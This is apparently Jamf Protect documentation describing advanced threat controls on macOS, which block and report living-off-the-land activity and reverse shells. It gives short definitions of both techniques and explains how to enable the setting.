The content in this section applies to the legacy threat prevention strategy in macOS Security. The legacy strategy will be deprecated in a future version of macOS Security. For information and instructions on configuring threat prevention strategies, see Threat Prevention (Beta).
Advanced threat controls intervene when unsafe or malicious activity considered high-risk by Jamf Threat Labs is detected. Detected activity is blocked and reported to administrators for further investigation.
This reduces the system's attack surface and increases protection against fileless malware and attackers employing the living-off-the-land (LotL) technique.
Available controls are derived from real-world attacks and observed threat actor behaviors, as well as behaviors known to weaken system security. Advanced threat controls target and block reverse shells.
- Living off the Land (LotL)
- Living-off-the-land attacks involve threat actors leveraging legitimate software and tools already present on the system to carry out their attacks. Instead of introducing custom malware, attackers exploit administrative tools, scripts, or system utilities built into the platform to execute their objectives without detection.
- Reverse Shell
- A reverse shell is a common technique used by attackers to command and control compromised systems by connecting back to the attacker's system. This allows the attacker to gain control over the compromised machine, typically for the purposes of performing reconnaissance, executing further attack stages, or data exfiltration.
Advanced threat controls are disabled by default. To enable this feature, you can create or edit a Jamf Protect plan and configure the advanced threat controls setting to Block and report or Report only.